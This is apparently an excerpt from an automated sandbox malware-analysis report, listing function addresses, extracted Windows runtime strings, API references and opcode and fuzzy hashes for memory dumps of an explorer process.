                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                      • API String ID: 0-871070163
                                                                                                                      • Opcode ID: 4a8880914d13ee3b1428d5a26838ce0fa98d252678bee5f279ac0009683fbc51
                                                                                                                      • Instruction ID: 66f4aad528d8779583e24038aa338fe2a7feef63eca043685332a96465f87e09
                                                                                                                      • Opcode Fuzzy Hash: 4a8880914d13ee3b1428d5a26838ce0fa98d252678bee5f279ac0009683fbc51
                                                                                                                      • Instruction Fuzzy Hash: C541E2357017029FD720DE26C840B6AB7E6EF89710F000A1DF85ADB6A0EB71F945AF91
                                                                                                                      Function 04C1B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04C5728C
                                                                                                                      Strings
                                                                                                                      • RTL: Resource at %p, xrefs: 04C572A3
                                                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04C57294
                                                                                                                      • RTL: Re-Waiting, xrefs: 04C572C1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                      • API String ID: 885266447-605551621
                                                                                                                      • Opcode ID: d73b0a7dc1738bc032cd2653eb400b2647214d6af46111e1f60f966eec905ef4
                                                                                                                      • Instruction ID: d994806d04d5a62bcf3ec2b406b4f3ec3728c1da08671c97d50ef267045c0182
                                                                                                                      • Opcode Fuzzy Hash: d73b0a7dc1738bc032cd2653eb400b2647214d6af46111e1f60f966eec905ef4
                                                                                                                      • Instruction Fuzzy Hash: E9412231701202AFD720DE26DC41B7AB7A6FB85714F144618FD55EB260EB31F982ABD4
                                                                                                                      Function 04C92300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: %%%u$]:%u
                                                                                                                      • API String ID: 48624451-3050659472
                                                                                                                      • Opcode ID: 61ac8f60409f48a8db1afbd2fea6417204cb3290ff0239b6647387e4d705f693
                                                                                                                      • Instruction ID: 7b7f72ef4688a6aa50eebfe1f17081c3e2c5641d8b1c93163f77b94e03af5540
                                                                                                                      • Opcode Fuzzy Hash: 61ac8f60409f48a8db1afbd2fea6417204cb3290ff0239b6647387e4d705f693
                                                                                                                      • Instruction Fuzzy Hash: B2314376A00219BFDF20DE29DC44BEE77EDFB44614F444995E889E3241EB30BE449BA1
                                                                                                                      Function 04C27D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __aulldvrm
                                                                                                                      • String ID: +$-
                                                                                                                      • API String ID: 1302938615-2137968064
                                                                                                                      • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                      • Instruction ID: 8847fb5d77350ad593050f1ec516be12d6d91dc18e14ab3a11f1a0bc4afb98ae
                                                                                                                      • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                      • Instruction Fuzzy Hash: 2F91A270E052369FDF24DE69CAC16BEB7A7BF44720F14461AE855E72C0E7B0BA408761
                                                                                                                      Function 04BE9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $$@
                                                                                                                      • API String ID: 0-1194432280
                                                                                                                      • Opcode ID: fd88892214e833801bdd48b5bf52c4332d7a69ed5c86a764159a7f82346beb57
                                                                                                                      • Instruction ID: eece0610a7a114f33c64c18484fdcff391afbc5bc87f4a77ca1e5a49b037c1e0
                                                                                                                      • Opcode Fuzzy Hash: fd88892214e833801bdd48b5bf52c4332d7a69ed5c86a764159a7f82346beb57
                                                                                                                      • Instruction Fuzzy Hash: 80813BB5D002699BDB31CF54CD45BEEB7B5AB48754F0041EAE919B7280E730AE84DFA0
                                                                                                                      Function 04BE04E5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RtlGetReturnAddressHijackTarget.NTDLL ref: 04BE0564
                                                                                                                      Strings
                                                                                                                      • kLsE, xrefs: 04BE0540
                                                                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 04BE063D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressHijackReturnTarget
                                                                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                      • API String ID: 806345674-2547482624
                                                                                                                      • Opcode ID: 73be20d8ce70bd7e28621ab80591e0a9dc5a069e3797869eacfc24ab0b53c634
                                                                                                                      • Instruction ID: 62c979b2a68c5fc85f487b0f7c5bcfd9a75bb8fa22f23d26151a8970a3110a6f
                                                                                                                      • Opcode Fuzzy Hash: 73be20d8ce70bd7e28621ab80591e0a9dc5a069e3797869eacfc24ab0b53c634
                                                                                                                      • Instruction Fuzzy Hash: 315189716047529FD724EF66C5807B7B7E4EFC5304F00887EE9AA87240E7B4A545CBA2